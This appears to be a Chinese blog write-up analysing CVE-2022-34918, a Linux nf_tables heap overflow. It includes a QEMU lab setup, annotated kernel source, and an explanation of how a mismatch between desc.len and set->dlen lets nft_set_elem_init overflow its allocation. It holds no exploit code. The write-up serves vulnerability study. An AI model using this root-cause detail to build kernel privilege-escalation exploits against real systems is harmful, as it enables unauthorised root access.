0%

CVE-2022-34918

1
Linux version 5.17.15 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #2 SMP PREEMPT Tue Dec 12 20:07:22 CST 2023
1
2
3
4
5
6
7
8
9
10
# Boot the challenge kernel under QEMU: 256M RAM, serial console only, one
# core, SMEP/SMAP exposed on the virtual CPU, PTI and KASLR requested on the
# kernel command line. "-no-reboot" together with "panic=-1" makes a kernel
# panic end the VM instead of rebooting it.
# The original command line spelled "quiet" as "qiet", which the kernel does
# not recognise as a parameter.
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
# Guest init script: mount the pseudo filesystems, lock down the flag file,
# restrict kernel pointer/dmesg exposure, then hand an unprivileged shell to
# the user. When that shell exits the machine is powered off.

# Pseudo filesystems and device nodes.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# The flag is owned by root and readable by its owner only.
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

# Restrict kernel pointer printing and dmesg access.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

# Interactive shell running as uid 1000 on the console.
setsid /bin/cttyhack setuidgid 1000 /bin/sh

# Reached once the shell above exits: clean up and power off immediately.
umount /proc
umount /sys

poweroff -d 0 -f

内核下载: Index of /pub/linux/kernel/v5.x/

关键的编译选项如下:

1
2
3
4
5
6
7
CONFIG_NF_TABLES=y
CONFIG_NETFILTER_NETLINK=y
CONFIG_BINFMT_MISC=m
CONFIG_USER_NS=y

CONFIG_E1000=m
CONFIG_E1000E=m

Netfilter 介绍

Netfilter 是一个 Linux 内核模块,用于防火墙功能,它提供了一个灵活的框架,允许用户自定义防火墙规则,以控制网络流量和保护网络安全

Netfilter 模块是 Linux 内核中流量过滤器的基础,可以与多种其他模块一起使用(例如:iptables 和 ip6tables),具有如下功能:

  • 网络地址转换(Network Address Translate)
  • 数据包内容修改
  • 数据包过滤的防火墙功能

在分析 Netfilter 之前先解释一些防火墙的相关概念:

链的概念:

  • 数据报文从进入服务器到出来会经过5道关卡,分别为:
    • Prerouting(路由前)、Input(输入)、Output(输出)、Forward(转发)、Postrouting(路由后)
  • 每一道关卡中有多个规则,数据报文必须按顺序一个一个匹配这些规则,这些规则串起来就像一条链,所以我们把这些关卡都叫“链”

1702384117476

表的概念:

  • 每一条链上有多条规则,有些规则的作用相似,多条具有相同功能的规则合在一起就组成了一个“表”
  • Netfilter 模块拥有5个表:
    • filter 表:用于过滤包,有 INPUT、FORWARD、OUTPUT 三个链(最常用的表)
    • nat 表:用于网络地址转换,有 PREROUTING、OUTPUT、POSTROUTING 三个链
    • mangle 表:用于给数据包做标记,几乎用不到
    • raw 表:可以实现不追踪某些数据包
    • security 表:用于强制访问控制(MAC)的网络规则(在centos6中并没有)

规则的概念:

  • 规则主要包含 “条件&动作”,即匹配出符合什么条件(规则)后,对它采取怎样的动作
  • 规则被添加到指定表的指定链中,由表达式和语句组成

表达式的概念:

  • 表达式表示值,可以是网络地址、端口号等常量,也可以是在规则集评估期间从数据包中收集的数据
  • 可以使用二进制、逻辑、关系和其他类型的表达式组合表达式以形成复杂或关系(匹配)表达式
  • 每个表达式都有一个数据类型,它决定了符号值的大小、解析和表示以及与其他表达式的类型兼容性

该模块的初始化由 nfnetlink_net_init 函数执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Set up the nfnetlink kernel socket for one struct net.
 *
 * Creates a NETLINK_NETFILTER kernel socket whose input callback is
 * nfnetlink_rcv and stores it in the nfnl_net state returned by
 * nfnl_pernet(net). The bind callback is only installed when
 * CONFIG_MODULES is defined.
 *
 * Returns 0 on success, or -ENOMEM when netlink_kernel_create() returns NULL.
 */
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv,
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};

nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
  • 如果后续收到 netfilter 的消息则会调用 netlink_kernel_cfg->input 函数,也即 nfnetlink_rcv 函数

创建 table 的函数:nf_tables_newtable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
/*
 * Handle a "new table" request.
 *
 * Looks the table up by nla[NFTA_TABLE_NAME]. If it already exists the
 * request is rejected with -EEXIST (NLM_F_EXCL) or -EOPNOTSUPP
 * (NLM_F_REPLACE), otherwise it is forwarded to nf_tables_updtable().
 * If the lookup fails with -ENOENT, a new nft_table is allocated,
 * initialised, queued through nft_trans_table_add() and appended to
 * nft_net->tables.
 *
 * Returns 0 on success or a negative errno. The error labels at the bottom
 * release what was acquired, in reverse order of acquisition.
 */
static int nf_tables_newtable(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_ctx ctx;
u32 flags = 0;
int err;

lockdep_assert_held(&nft_net->commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask,
NETLINK_CB(skb).portid); /* check whether a table named by NFTA_TABLE_NAME already exists */
if (IS_ERR(table)) {
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

return nf_tables_updtable(&ctx); /* the table already exists: update it */
}

if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
if (flags & ~NFT_TABLE_F_MASK)
return -EOPNOTSUPP;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL); /* the table does not exist: allocate and initialise a new one */
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

if (nla[NFTA_TABLE_USERDATA]) {
table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL);
if (table->udata == NULL)
goto err_table_udata;

table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]);
}

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains); /* initialise the four list heads */
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;
if (table->flags & NFT_TABLE_F_OWNER)
table->nlpid = NETLINK_CB(skb).portid;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla); /* put the new table into the nf_tables context */
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &nft_net->tables);
return 0;
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->udata);
err_table_udata:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

创建 chain 的函数:nf_tables_newchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
/*
 * Handle a "new chain" request.
 *
 * The owning table must exist. The chain is then looked up by
 * nla[NFTA_CHAIN_HANDLE] or, failing that, by nla[NFTA_CHAIN_NAME]; a
 * request carrying neither of those nor nla[NFTA_CHAIN_ID] is rejected
 * with -EINVAL. An existing chain is updated via nf_tables_updchain(),
 * otherwise a new one is created via nf_tables_addchain().
 *
 * Returns the result of the update/add helper, or a negative errno when
 * validation of the table, policy or flags fails.
 */
static int nf_tables_newchain(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct nft_chain *chain = NULL;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;
u32 flags = 0;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* find the table first; bail out if there is none */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME]; /* see whether the chain exists: update it if so, otherwise add a new chain */

if (nla[NFTA_CHAIN_HANDLE]) { /* look the chain up by nla[NFTA_CHAIN_HANDLE] */
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else if (nla[NFTA_CHAIN_NAME]) { /* look the chain up by nla[NFTA_CHAIN_NAME] */
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
} else if (!nla[NFTA_CHAIN_ID]) {
return -EINVAL;
}

/* A policy is only accepted for an existing base chain, or for a new
 * chain that also carries nla[NFTA_CHAIN_HOOK]; it must be NF_DROP or
 * NF_ACCEPT.
 */
if (nla[NFTA_CHAIN_POLICY]) {
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

/* Flags come from the request, or are inherited from the existing chain. */
if (nla[NFTA_CHAIN_FLAGS])
flags = ntohl(nla_get_be32(nla[NFTA_CHAIN_FLAGS]));
else if (chain)
flags = chain->flags;

if (flags & ~NFT_CHAIN_FLAGS)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

if (chain != NULL) {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

flags |= chain->flags & NFT_CHAIN_BASE;
return nf_tables_updchain(&ctx, genmask, policy, flags, attr,
extack); /* chain found: update it */
}

return nf_tables_addchain(&ctx, family, genmask, policy, flags, extack); /* chain not found: create it */
}

创建 rule & expression 的函数:nf_tables_newrule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
/*
 * Handle a "new rule" request (rule plus its expressions).
 *
 * Steps, in order:
 *   1. resolve the table and the chain (by name or by chain id);
 *   2. resolve the rule handle / position, honouring NLM_F_EXCL,
 *      NLM_F_REPLACE and NLM_F_CREATE;
 *   3. parse every nested expression into expr_info[] and sum their sizes;
 *   4. allocate the rule with room for the expressions and optional userdata;
 *   5. instantiate each expression inside the rule;
 *   6. queue the transaction and link the rule into the chain.
 *
 * Returns 0 (or the result of nft_table_validate()) on success, otherwise a
 * negative errno. The error labels undo the steps above in reverse order.
 */
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
unsigned int size, i, n, ulen = 0, usize = 0;
u8 genmask = nft_genmask_next(info->net);
struct nft_rule *rule, *old_rule = NULL;
struct nft_expr_info *expr_info = NULL;
u8 family = info->nfmsg->nfgen_family;
struct nft_flow_rule *flow = NULL;
struct net *net = info->net;
struct nft_userdata *udata;
struct nft_table *table;
struct nft_chain *chain;
struct nft_trans *trans;
u64 handle, pos_handle;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
int err, rem;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* look up the table */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

if (nla[NFTA_RULE_CHAIN]) { /* look up the chain */
chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}
if (nft_chain_is_bound(chain))
return -EOPNOTSUPP;

} else if (nla[NFTA_RULE_CHAIN_ID]) {
chain = nft_chain_lookup_byid(net, nla[NFTA_RULE_CHAIN_ID]);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
}
} else {
return -EINVAL;
}

/* With a handle the request targets an existing rule and is only valid
 * as a replace; without one a new handle is allocated and an optional
 * position (by handle or by id) selects the neighbouring rule.
 */
if (nla[NFTA_RULE_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
if (!(info->nlh->nlmsg_flags & NLM_F_CREATE) ||
info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

if (chain->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) { /* if nla[NFTA_RULE_EXPRESSIONS] is set, parse every expression first and accumulate their total size in size */
expr_info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!expr_info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err_release_expr;
if (n == NFT_RULE_MAXEXPRS)
goto err_release_expr;
err = nf_tables_expr_parse(&ctx, tmp, &expr_info[n]);
if (err < 0) {
NL_SET_BAD_ATTR(extack, tmp);
goto err_release_expr;
}
size += expr_info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err_release_expr;

if (nla[NFTA_RULE_USERDATA]) { /* if nla[NFTA_RULE_USERDATA] is set, compute the userdata size into usize */
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL); /* allocate the rule and initialise its fields */
if (rule == NULL)
goto err_release_expr;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

/* Instantiate the parsed expressions back to back inside the rule. */
expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &expr_info[i], expr);
if (err < 0) {
NL_SET_BAD_ATTR(extack, expr_info[i].attr);
goto err_release_rule;
}

if (expr_info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

/* Cleared so the err_release_expr loop skips this entry. */
expr_info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (chain->flags & NFT_CHAIN_HW_OFFLOAD) {
flow = nft_flow_rule_create(net, rule);
if (IS_ERR(flow)) {
err = PTR_ERR(flow);
goto err_release_rule;
}
}

if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
err = nft_delrule(&ctx, old_rule);
if (err < 0)
goto err_destroy_flow_rule;

trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}
list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (!trans) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}

/* NLM_F_APPEND inserts after old_rule (or at the chain tail);
 * otherwise the rule goes before old_rule (or at the chain head).
 */
if (info->nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(expr_info);
chain->use++;

if (flow)
nft_trans_flow_rule(trans) = flow;

if (nft_net->validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;

err_destroy_flow_rule:
if (flow)
nft_flow_rule_destroy(flow);
err_release_rule:
nf_tables_rule_release(&ctx, rule);
err_release_expr:
/* Drop the references still held by parsed-but-unused expressions. */
for (i = 0; i < n; i++) {
if (expr_info[i].ops) {
module_put(expr_info[i].ops->type->owner);
if (expr_info[i].ops->type->release_ops)
expr_info[i].ops->type->release_ops(expr_info[i].ops);
}
}
kvfree(expr_info);

return err;
}

expression 总共有如下多种类型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Table of pointers to the expression types listed in this write-up. */
static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
&nft_counter_type,
};

漏洞分析

漏洞来自于 CVE-2022-34918,函数 nft_set_elem_init 存在堆溢出,溢出长度可达 64-16=48 字节,漏洞对象可以位于 kmalloc-{64,96,128,192}

先看 nft_set_elem_init 函数的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/*
 * Allocate and populate one set element.
 *
 * The allocation is sized as set->ops->elemsize + tmpl->len, while the
 * memcpy lengths below come from the set itself (set->klen / set->dlen),
 * not from the template. Each field is only written when the matching
 * extension is present in the element.
 *
 * Returns the new element, or NULL when kzalloc() fails.
 */
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl,
const u32 *key, const u32 *key_end,
const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp); /* per this write-up, tmpl->len already accounts for desc.len at this point */
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY))
memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen); /* if set->dlen is larger than the desc.len used to size the template, this copy can overflow the allocation */
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
/* No explicit expiration given: expire after the timeout instead. */
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}
  • 函数 memcpy 使用的拷贝长度来自于 nft_set 对象,但拷贝的目标是 nft_set_ext,其大小来自于 nft_set_ext_tmpl 对象
  • 如果 kzalloc 申请的大小和 memcpy 拷贝的大小不匹配,则可能发生堆溢出

两个关键结构体的条目如下:

1
2
3
4
5
/*
 * Header of the extension area of a set element: a genmask byte, one
 * offset byte per extension type (NFT_SET_EXT_NUM entries) and a trailing
 * flexible data area.
 * NOTE(review): presumably offset[id] locates extension id inside data[] -
 * the accessors that use it are not shown here.
 */
struct nft_set_ext {
u8 genmask;
u8 offset[NFT_SET_EXT_NUM];
char data[];
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * An nf_tables set. The fields that matter for the code quoted in this
 * write-up are ops (ops->elemsize sizes each element), klen and dlen (copy
 * lengths used by nft_set_elem_init), dtype, flags, timeout, objtype and
 * bindings (all read by nft_add_set_elem).
 */
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen; /* length passed to memcpy for the key and key_end extensions */
u8 dlen; /* length passed to memcpy for the data extension */
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

分析 nft_add_set_elem 函数,确定 tmpl->len 的初始化过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
/*
 * Excerpt of nft_add_set_elem(): the parts that build the extension
 * template (tmpl) for a new set element. Lines consisting of "......" mark
 * code omitted by the write-up, so declarations and the tail of the
 * function are not visible here.
 *
 * What the visible part shows: key and key_end are accounted with
 * set->klen, whereas the data extension is accounted with desc.len, the
 * length produced while parsing the user-supplied NFTA_SET_ELEM_DATA.
 */
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{

......

/* Timeout: taken from the attribute if present (only allowed on sets
 * with NFT_SET_TIMEOUT), otherwise inherited from the set.
 */
timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

......

if (nla[NFTA_SET_ELEM_KEY]) {
err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen); /* account set->klen bytes in tmpl for the key */
}

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen); /* account set->klen bytes in tmpl for the key end */
}

......

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF],
set->objtype, genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

/* Validate the parsed data against every map binding of the set. */
dreg = nft_type_to_reg(set->dtype);
list_for_each_entry(binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len); /* account desc.len (not set->dlen) bytes in tmpl for the data */
}

......

}
  • 在该函数中,tmpl->len 将被初始化为 desc.len(跟 set->dlen 没有必然的联系)

用于控制 tmpl->len 大小的 nft_data_desc 结构体可以被用户控制,相关函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Parse the user-supplied data attribute of a set element.
 *
 * nft_data_init() fills both data and desc from attr. The result is then
 * rejected with -EINVAL only when desc->type is not NFT_DATA_VERDICT and
 * desc->len differs from set->dlen; for NFT_DATA_VERDICT data the length
 * is not compared with set->dlen at all.
 *
 * Returns 0 on success or a negative errno.
 */
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data,
struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr); /* initialise desc and data from the user-supplied attr */
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) { /* per the write-up: the overflow needs desc->len smaller than set->dlen, which only passes this check when the type is NFT_DATA_VERDICT */
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

漏洞的触发链为:

  • nf_tables_newsetelem -> nft_add_set_elem -> nft_set_elem_init

入侵思路

核心步骤参考了该博客:基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践 (veritas501.github.io)

